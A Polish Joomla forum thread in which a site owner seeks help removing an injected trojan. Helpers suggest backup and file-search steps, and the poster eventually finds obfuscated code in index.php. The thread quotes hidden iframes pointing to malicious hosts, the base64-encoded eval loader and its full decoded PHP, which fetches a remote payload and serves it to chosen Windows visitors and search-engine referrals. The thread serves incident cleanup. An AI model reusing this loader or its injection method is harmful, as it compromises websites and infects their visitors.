Jak usunąć JS/Iframe.FS koń trojański
Witam
Od razu mówię szukałem na forum i google i nie znalazłem rozwiązania tego problemy prosił bym o podanie linku lub napisanie jak to zrobić .
W google znalazłem ze mam usunąć kawałek szkodliwego kodu w pliku index.php ale tam niczego takiego nie ma :
trojan.jpg
Prosił bym o cierpliwość i pomoc w problemie .
W jakim pliku index.php miałby się znajdować ten kod? Takich plików jest wiele, być może jest to plik z katalogu szablonu Twojej strony?
W razie potrzeby zastosuj przeszukiwanie za pomocą programu Total Commander, ale trzeba wtedy mieć pobrane pliki systemowe na swoim dysku. Przy okazji mógłbyś też przećwiczyć zrobienie i pobranie kopii zapasowej za pomocą komponentu Akeeba, najlepiej w pliku zip, by uniknąć kłopotów z rozpakowaniem jej na swoim dysku.
Na wiki.joomla.pl znajdziesz sposób postępowania po włamaniu, jeśli nie chcesz sie tym osobiście zajmować (lub nie potrafisz), zleć to ludziom, którzy nie tylko zniwelują złośliwy kod, ale i zabezpieczą ci stronę www.
Współautor bloga o systemie Joomla! -> blog.elimu.pl < oraz kilku książek i artykułów o tym CMS.
U mnie Total Commander w żadnym pliku nie znalazł iframe'ów, jednak " <iframe src="http://www.google.com/robots.txt" width=1 height=1 style="visibility: hidden">" jest na początku kodu strony, tzn. jest dopisany do kodu strony z templatki. Google oznaczył stronę pisząc, że przekierowywała na jakiś serwer "cośtam.ftp1.biz/pony". Być może wirus podmienił adres czasowo aby się ukryć...? W bazie go też nie znalazłem.
Zmieniłem dostępy ale nie mogę nigdzie znaleźć tego wpisu, który jest na stronie, aby usunąć.
Jak ktoś ma pomysł proszę o wsparcie. Problem u mnie występuje na kilku stronach, na tym samym serwerze.
Jeśli złośliwy kod znajduje się w którymś z plików Joomla! to odnalezienie go polega na przeszukaniu wszystkich plików, po ich wcześniejszym pobraniu z serwera, najlepiej za pomocą wspomnianego komponentu Akeeba. Proponowałbym też użyć do testów środowiska lokalnego - JAMP. Po rozpakowaniu paczki instalacyjnej Akeeba w specjalnie utworzonym dla niej katalogu w JAMP'ie należy się posłużyć Total Commanderem w celu zlokalizowania pliku z poszukiwanym kodem. W tym celu w jednym z okien Total Commandera otwieramy katalog z rozpakowanymi plikami, z menu Polecenia wybieramy opcję Szukaj (Alt+F7) a w niej zaznaczamy opcję Znajdź tekst. W okienku obok wpisujemy jakiś najbardziej charakterystyczny fragment poszukiwanego złośliwego kodu. Wyniki przeszukiwania powinny wskazać plik zawierajacy wstawiony kod. Po zlokalizowaniu i usunięciu poszukiwanego kodu należy przetestować działanie strony w środowisku lokalnym na swoim komputerze i dopiero po sprawdzeniu prawidłowego funkcjonowania przywrócić poprawne działanie strony podmieniając na serwerze zlokalizowany pliku na plik pozbawiony złośliwego kodu.Wysłane przez dominiks
Nie sądzę też by w bazie danych należało poszukiwać tego kodu, chyba, że jest on dodany do treści strony, co jest mało prawdopodobne, bo byłoby to zbyt łatwe dla odnalezienia i usunięcia.
Niestety w żadnym pliku nie można znaleźć poszukiwanego kodu. Nie wiem jaki mechanizm wstawia na górze strony <iframe src="http://www.google.com/robots.txt" width=1 height=1 style="visibility: hidden">. Na razie ten iframe się nie zmienia i dostępne narzędzia nie wykazują problemu.
jak się można było spodziewać link w ifram'ie zmienił się z google.com na wirusowy <iframe src="http://rwyzgm.ftp1.biz/54gy8sc/counter.php?id=2" width=1 height=1 style="visibility: hidden"></iframe> a w plikach ani widu ani słychu takiego kodu... może ten ciąg znaków jest zakoś zakodowany...
Zawsze można się pokusić o porównanie podejrzanych plików z serwera z ich oryginalnymi odpowiednikami. A swoją drogą skąd wzięła się informacja, że posiadasz takowy plik index.php zawierający szkodliwy kod?
moim największym problemem jest to, że wszystko wskazuje na to, że nie mam takowego pliku, ale po przetworzeniu witryny przez joomle jakoś się ten iframe pojawia. Dodam, że link jest dynamiczny (wnioskuję, że wirus go musi ściągać). Dodany kod dzisiaj jest taki:
<iframe src="http://dtuaj.ftp1.biz/ip/stat.php" width=1 height=1 style="visibility: hidden"></iframe>
widać go w źródle strony (robot google też to wychwycił i dodał stronę do podejrzanych).
Mam gnoja!
Wcześniej nie zwróciłem uwagi ale podmienił na stronie
"
echo JResponse::toString($mainframe->getCfg('gzip'));
"
na
"
$JResp = JResponse::toString($mainframe->getCfg('gzip'));
/*rrt*/
/*eval(base64_decode("JHVybCAgICAgICA9ICdodHRwOi8vd 29yZHByZXNzdGVzdDIuaW5mby8xLnR4dCc7DQokbW9kZSAgICA gID0gMTsvLzEg6OvoIDINCg0KaW5pX3NldCgnZGVmYXVsdF9zb 2NrZXRfdGltZW91dCcsICAgIDE1KTsgICAgDQoNCg0KDQovL8f g7/Du8SDqIO3g+OXs8yD17vHy818NCmZ1bmN0aW9uIGdldHVybF8x KCR1cmwpDQp7DQoJJGN0eD1zdHJlYW1fY29udGV4dF9jcmVhdG UoYXJyYXkoJ2h0dHAnPT4gICBhcnJheSgndGltZW91dCcgPT4g MTUgKSkpOw0KDQoJcmV0dXJuIGZpbGVfZ2V0X2NvbnRlbnRzKC R1cmwsZmFsc2UsJGN0eCk7DQp9DQoNCi8vx+Dv8O7xIOog7eD4 5ezzIPXu8fLzXzIgXCDR7url8vsNCmZ1bmN0aW9uIGdldHVybF 8yKCAkc29jaywkaG9zdCwgJHBhdGgsICRxdWVyeSApDQp7DQoJ ZnB1dHMoJHNvY2ssICJHRVQgIiAuICRwYXRoIC4gIj8iIC4gJH F1ZXJ5IC4gIiAgSFRUUC8xLjBcclxuIiAuDQoJIkhvc3Q6ICRo b3N0XHJcbiIgLg0KCSJVc2VyLUFnZW50OiBNb3ppbGxhLzUuMC AoV2luZG93czsgVTsgV2luZG93cyBOVCA1LjE7IGVuLVVTOyBy djoxLjguMC4zKSBHZWNrby8yMDA2MDQyNiBGaXJlZm94LzEuNS 4wLjNcclxuIiAuDQoJIkFjY2VwdDogKi8qXHJcbiIgLg0KCSJB Y2NlcHQtTGFuZ3VhZ2U6IGVuLXVzLGVuO3E9MC41XHJcbiIgLg 0KCSJBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtx PTAuNywqO3E9MC43XHJcbiIgLg0KCSJLZWVwLUFsaXZlOiAzMD BcclxuIiAuDQoJIkNvbm5lY3Rpb246IGtlZXAtYWxpdmVcclxu IiAuDQoJIlJlZmVyZXI6IGh0dHA6Ly8kaG9zdFxyXG5cclxuIi k7DQoJd2hpbGUgKCAkbGluZSA9IGZyZWFkKCAkc29jaywgNDA5 NiApICkNCgl7DQoJCSRyZXNwb25zZSAuPSAkbGluZTsNCgl9DQ oJZmNsb3NlKCAkc29jayApOw0KCSRwb3MgICAgICA9IHN0cnBv cygkcmVzcG9uc2UsICJcclxuXHJcbiIpOw0KCSRyZXNwb25zZS A9IHN1YnN0cigkcmVzcG9uc2UsICRwb3MgKyA0KTsNCglyZXR1 cm4gJHJlc3BvbnNlOw0KfQ0KLy/H4O/w7vEg6iDt4Pjl7PMg9e7x8vNfMyBcIMrz8Ov7DQpmdW5jdGlvb iBnZXR1cmxfMygkdXJsKQ0Kew0KCSRjaCA9IGN1cmxfaW5pdCg kdXJsKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBR EVSLCBGQUxTRSk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1B UX1JFVFVSTlRSQU5TRkVSLCBUUlVFKTsNCgljdXJsX3NldG9wd CgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTUpOw0KCSRyZXN1bHQ gPSBjdXJsX2V4ZWMoJGNoKTsNCgljdXJsX2Nsb3NlKCRjaCk7D QoJcmV0dXJuICRyZXN1bHQ7DQp9DQoNCmZ1bmN0aW9uIGlzX2d vb2RfdWEoJHVzZXJhZ2VudCkNCnsNCglpZiggc3RyaXBvcygkd XNlcmFnZW50LCAnb3BlcmEnKSE9PWZhbHNlIHx8IHN0cmlwb3M oJHVzZXJhZ2VudCwgJ0ZpcmVmb3gnKSB8fCBzdHJpcG9zKCR1c 2VyYWdlbnQsICdNU0lFJykpDQoJew0KCQlyZXR1cm4gMTsNCgl 9DQoJcmV0dXJuIDA7DQp9DQoNCmZ1bmN0aW9uIGlzX3dpbmRvd 3NfdWEoJHVzZXJhZ2VudCkNCnsNCglpZihzdHJpcG9zKCR1c2V yYWdlbnQsICd3aW5kb3dzJykpDQoJew0KCQlyZXR1cm4gMTsNC gl9DQoJcmV0dXJuIDA7DQp9DQoNCmZ1bmN0aW9uIG1haW53b3J rKCR1cmwpDQp7DQoJaWYoIGluaV9nZXQoImFsbG93X3VybF9mb 3BlbiIpID09IDEpDQoJew0KCQllY2hvIGdldHVybF8xKCR1cmw pOw0KCX0NCgllbHNlDQoJew0KCQkkdXJsXzEgPSBwYXJzZV91c mwoJHVybCk7DQoNCgkJaWYoJHNvY2sgPSBAZnNvY2tvcGVuKCR 1cmxfMVsnaG9zdCddLCA4MCwkZXJybm8sICRlcnJzdHIsMTUpK Q0KCQl7DQoJCQllY2hvIGdldHVybF8yKCAkc29jaywgJHVybF8 xWydob3N0J10sICR1cmxfMVsncGF0aCddLCAkdXJsXzFbJ3F1Z XJ5J10gKTsNCgkJfQ0KCQllbHNlaWYoIEBmdW5jdGlvbl9leGl zdHMoJ2N1cmxfaW5pdCcpICkNCgkJew0KCQkJZWNobyBnZXR1c mxfMygkdXJsKTsNCgkJfQ0KCX0NCn0NCg0KDQokdWEgPSBAJF9 TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KDQppZihpc193a W5kb3dzX3VhKCR1YSkpDQp7DQoJaWYgKCRtb2RlID09IDEpDQo Jew0KCQlpZiAoaXNfZ29vZF91YSgkdWEpKQ0KCQl7DQoJCQltY Wlud29yaygkdXJsKTsNCgkJfQ0KCX0NCgllbHNlaWYgKCRtb2R lID09IDIpDQoJew0KCQlpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUV FBfUkVGRVJFUiddKSkNCgkJew0KCQkJJHJlZmVyZXIgPSAkX1N FUlZFUlsnSFRUUF9SRUZFUkVSJ107DQoJCQlpZiAoc3RyaXN0c igkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmV yLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlc iIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJ pc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkc mVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ uaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiK SBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN 0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yI HN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHI oJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRja CgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw 9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlX C4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZW ZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVy ZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZX IsImFvbC5jb20iKSkNCgkJCXsNCgkJCQlpZiAoIXN0cmlzdHIo JHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZX IsImludXJsIikpDQoJCQkJew0KCQkJCQltYWlud29yaygkdXJs KTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQp9"));*/
$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
echo $JResp;
"
i tak jak przypuszczałem zakodował sobie treść. Decoder base64 pokazał, że ten ciąg znaków to skrypt:
"
$url = 'http://wordpresstest2.info/1.txt';
$mode = 1;//1 2
ini_set('default_socket_timeout', 15);
// _
function geturl_1($url)
{
$ctx=stream_context_create(array('http'=> array('timeout' => 15 )));
return file_get_contents($url,false,$ctx);
}
// _2 \
function geturl_2( $sock,$host, $path, $query )
{
fputs($sock, "GET " . $path . "?" . $query . " HTTP/1.0\r\n" .
"Host: $host\r\n" .
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n" .
"Accept: */*\r\n" .
"Accept-Language: en-us,en;q=0.5\r\n" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
"Keep-Alive: 300\r\n" .
"Connection: keep-alive\r\n" .
"Referer: http://$host\r\n\r\n");
while ( $line = fread( $sock, 4096 ) )
{
$response .= $line;
}
fclose( $sock );
$pos = strpos($response, "\r\n\r\n");
$response = substr($response, $pos + 4);
return $response;
}
// _3 \
function geturl_3($url)
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function is_good_ua($useragent)
{
if( stripos($useragent, 'opera')!==false || stripos($useragent, 'Firefox') || stripos($useragent, 'MSIE'))
{
return 1;
}
return 0;
}
function is_windows_ua($useragent)
{
if(stripos($useragent, 'windows'))
{
return 1;
}
return 0;
}
function mainwork($url)
{
if( ini_get("allow_url_fopen") == 1)
{
echo geturl_1($url);
}
else
{
$url_1 = parse_url($url);
if($sock = @fsockopen($url_1['host'], 80,$errno, $errstr,15))
{
echo geturl_2( $sock, $url_1['host'], $url_1['path'], $url_1['query'] );
}
elseif( @function_exists('curl_init') )
{
echo geturl_3($url);
}
}
}
$ua = @$_SERVER['HTTP_USER_AGENT'];
if(is_windows_ua($ua))
{
if ($mode == 1)
{
if (is_good_ua($ua))
{
mainwork($url);
}
}
elseif ($mode == 2)
{
if (isset($_SERVER['HTTP_REFERER']))
{
$referer = $_SERVER['HTTP_REFERER'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com"))
{
if (!stristr($referer,"cache") or !stristr($referer,"inurl"))
{
mainwork($url);
}
}
}
}
}
"
Reguły pisania
Cytuj